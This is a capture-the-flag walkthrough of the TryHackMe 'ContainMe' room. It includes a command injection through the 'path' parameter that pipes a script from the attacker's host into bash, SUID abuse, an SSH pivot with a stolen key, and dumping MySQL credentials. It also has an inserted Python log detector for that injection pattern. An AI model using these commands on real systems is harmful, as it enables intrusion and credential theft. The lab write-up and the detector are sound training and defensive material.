ContainMe Walkthrough En | TryHackMe – Write-up

Where am I? Catch me


ContainMe is a TryHackMe CTF. The initial approach is interesting: a command injection has to be found. The reverse-engineering part is the main blocker; once past it, the privilege escalation is very simple.


Enumeration

Command :

nmap -T5 10.10.235.114

Four open ports, including at least two SSH services (ports 22 and 8022) and an unknown service on port 2222.

Web enumeration

dirsearch -u 10.10.235.114 -x 403

Dirsearch finds several web pages, including /index.php/login. This page shows us the contents of a folder, probably /var/www/html. The page source gives us this hint:

<!-- where is the path? -->


Fuzzing path

The hint indicates that we have to find the right parameter name to obtain an LFI/RCE. We will use wfuzz.

Command :

wfuzz -u 'http://10.10.235.114/index.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --filter 'h!=329'

The parameter found is: path


Initial FootHold

With Burp Suite, a few tests show how login.php?path= works. Since an ls command is already run on the supplied value, a ; must be inserted to append an additional command.

Reverse Shell

Still with Burp Suite, we fetch a bash script hosted on the Kali machine and pipe it into bash with |

Command :

;curl+http://10.11.38.124:8585/test.sh | bash

Remember to URL-encode the command (Ctrl+U in Burp) so that the server interprets what is being asked.

For curl to retrieve the test.sh file, start a web server with Python using the following command:

python3.9 -m http.server 8585

Contents of the test.sh file :
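From the defender's side, the injection above leaves a clear trace in the web server's access log: a percent-encoded `;` or `|` inside the `path` parameter of index.php. The following Python script is an added example, not part of the original write-up or the room; it parses constructed common-log-format lines, decodes the `path` value (one extra decode catches double encoding) and flags shell separators or a curl/wget piped into bash. The IP addresses and log lines are constructed sample data.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Separators and substitutions that let a value escape the intended "ls <path>" command.
SHELL_META = re.compile(r"[;|&`$\n]")
# Fetch-and-execute shape used against this box: curl/wget ... | bash
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

# Common-log-format request line: client ip, timestamp, method, target, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines (not from a real host); the third mirrors the
# percent-encoded "; curl ... | bash" payload described above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:10:00:01 +0000] "GET /index.php?path=/var/www/html HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:07 +0000] "GET /index.php?path=%3Bid HTTP/1.1" 200 640
10.0.0.5 - - [10/Oct/2023:10:00:15 +0000] "GET /index.php?path=%3Bcurl+http%3A%2F%2F10.0.0.9%3A8585%2Ftest.sh+%7C+bash HTTP/1.1" 200 12
10.0.0.7 - - [10/Oct/2023:10:01:00 +0000] "GET /index.php/login HTTP/1.1" 200 800
"""


def classify(value):
    """Return a reason if the parameter value looks like command injection, else None."""
    # parse_qs already decoded one layer; a second unquote() catches double-encoded values.
    decoded = unquote(value)
    if FETCH_EXEC.search(decoded):
        return "download-and-execute"
    if SHELL_META.search(decoded):
        return "shell metacharacter"
    return None


def find_injections(log_text, param="path"):
    """Return (client ip, decoded value, reason) for every suspicious use of `param`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlparse(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((m.group("ip"), unquote(value), reason))
    return hits


if __name__ == "__main__":
    for ip, value, reason in find_injections(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

Run it against a real access.log by reading the file into `find_injections`; a benign directory listing such as the first sample line produces no hit.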

Local enumeration - search for SUID binaries

Command :

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

The crypt binary is SUID root and can be run by anyone. If we try to run it with an argument, for example ./crypt id, it returns an error message:

Unable to decompress.

Lateral movement to Mike's account?

Command :

./crypt mike

We are now a root account, which must be inside a container. We enumerate it with linpeas.

Command to download it:

wget http://10.11.38.124:8585/linpeas2.sh

In mike's home directory there is a private key, id_rsa, that we will try to use. It remains to be seen which SSH server accepts this key.

The system has three network interfaces (192.168.250.10, 172.16.20.2, 127.0.0.1). The key does not work against any of these addresses.

With the following command line, a new IP address appears, to which we can connect over SSH.

for ip in $(seq 1 255); do ping -c 1 172.16.20.$ip; done

SSH login to Mike's account

Command :

ssh mike@172.16.20.6 -i id_rsa

It is not possible to reach the TryHackMe network, probably because there is no routing between the different network interfaces and the container. Enumeration has to be done manually.

Privilege escalation

There is a SQL server listening on the loopback interface.

Command :

netstat -tulpn

Connecting to the SQL server

Command :

mysql -u mike -p

The connection requires a password, which has to be guessed.

Commands to extract the user account credentials:

show databases;

use accounts;

show tables;

select * from users;


We obtain the root account's password. All that remains is to log in as root and retrieve the flag.


That’s all folks

Thank you for taking the time to visit the site and read this write-up.

I hope it helped you and taught you something new.

Please feel free to leave a comment or share this article.
